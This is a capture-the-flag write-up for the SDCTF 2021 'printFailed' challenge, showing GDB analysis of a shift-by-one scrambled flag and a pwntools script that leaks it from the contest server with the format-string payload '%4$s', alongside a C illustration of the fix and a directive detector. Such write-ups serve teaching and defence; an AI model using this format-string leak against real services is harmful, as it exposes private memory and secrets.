pwn

Sdctf 2021

printFailed

Solved By : thewhiteh4t

  • Right from the start we get a segfault on this binary
./printFailed
zsh: segmentation fault (core dumped)  ./printFailed
  • Let’s investigate in GDB

  • It is trying to open flag.txt, which does not exist; I created the file, relaunched the binary, and now it works
./printFailed
can you guess the scrambled flag?
yes
you guessed:
yes
wrong
  • It echoes the input; let’s look in GDB again
  • A scramble function is called soon after the file is read
  • Here we can see the scrambled flag :

"tedug|g5l4`gm5h~\v", '\001' <repeats 22 times>
  • this looks familiar
tedug|g5l4`gm5h~\v
sdctf{f4k3_fl4g}
  • so each character is shifted forward by one!
  • let’s try feeding the scrambled flag to the local binary
#!/usr/bin/env python3

from pwn import *

elf = ELF('./printFailed')

# the scrambled flag exactly as gdb showed it: every byte of flag.txt shifted
# up by one (the trailing \v is the newline), followed by the 22 bytes of \x01
# that were sitting in the buffer after it
guess = b'tedug|g5l4`gm5h~\v' + b'\001' * 22

p = elf.process()
p.send(guess)
out = p.recv(4096)
print(out)

  • the scrambled flag works!
  • but now the issue is that we don’t know the actual flag on the server, so we cannot construct its scrambled form
  • earlier we saw that the binary echoes the input, which hints at a format string vulnerability
  • this article helped a lot in figuring out the way forward
  • https://nikhilh20.medium.com/format-string-exploit-ccefad8fd66b
  • https://man7.org/linux/man-pages/man3/printf.3.html
%s   -> string
%2$s -> 2nd argument
%3$s -> 3rd argument
  • I tried them one by one and %4$s leaks the scrambled flag!
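The root cause and its fix, as an added illustration in C (not the challenge’s source, which we do not have): the leak only works because the guess is used as the printf format string, so the mitigation is a constant format with the guess passed as data. The helpers and the sample strings are mine; `unscramble` reverses the shift-by-one seen in gdb.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not the challenge binary's code. The leak works because
 * the program does something like:
 *     printf(guess);            // guess comes straight from the user
 * so every directive in the guess (e.g. %4$s) is interpreted and reads an
 * argument slot that was never passed. */

/* Hardened form: the format string is a constant and the guess is only data.
 * Writes the echo into out and returns the length snprintf would produce. */
int echo_guess_fixed(const char *guess, char *out, size_t outsz) {
    return snprintf(out, outsz, "you guessed:\n%s\n", guess);
}

/* Input-validation / detection helper: returns 1 if s contains a conversion
 * directive (a '%' not followed by another '%'). Useful for rejecting or
 * flagging probes such as "%s%s%s" or "%4$s" in logged input. */
int has_format_directive(const char *s) {
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }   /* "%%" is a literal percent */
        return 1;
    }
    return 0;
}

/* Reverses the scramble observed in gdb: every byte was shifted up by one.
 * Returns the number of bytes written, not counting the terminator. */
size_t unscramble(const char *in, char *out, size_t outsz) {
    size_t n = 0;
    if (outsz == 0) return 0;
    for (; in[n] != '\0' && n + 1 < outsz; n++)
        out[n] = (char)(in[n] - 1);
    out[n] = '\0';
    return n;
}

int main(void) {
    char echo[128], flag[64];
    const char *probe = "%4$s";                 /* the payload from the writeup */
    echo_guess_fixed(probe, echo, sizeof echo); /* echoed verbatim, no leak */
    fputs(echo, stdout);
    printf("directive in input: %d\n", has_format_directive(probe));
    unscramble("tedug|g5l4`gm5h~", flag, sizeof flag);   /* constructed from the gdb dump */
    printf("unscrambled: %s\n", flag);
    return 0;
}
```

Compiling the vulnerable `printf(guess)` line with gcc’s `-Wformat-security` produces a warning, which is the cheapest way to catch this pattern in a code base.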

  • Here is the final script and output :
#!/usr/bin/env python3

from pwn import *

host = 'printf.sdc.tf'
port = 1337

# positional directive: prints the 4th argument as a string, which turned
# out to be the pointer to the scrambled flag
payload = b'%4$s'

conn = remote(host, port)
conn.send(payload + b'\n')
# response lines: the prompt, "you guessed:", then the leaked scrambled flag
res = conn.recv(4096).decode().split('\n')[2]
conn.close()

print(res)

# undo the scramble: shift every character back by one
for char in res:
    print(chr(ord(char) - 1), end='')
print()

OUTPUT :

Published on : 10 May 2021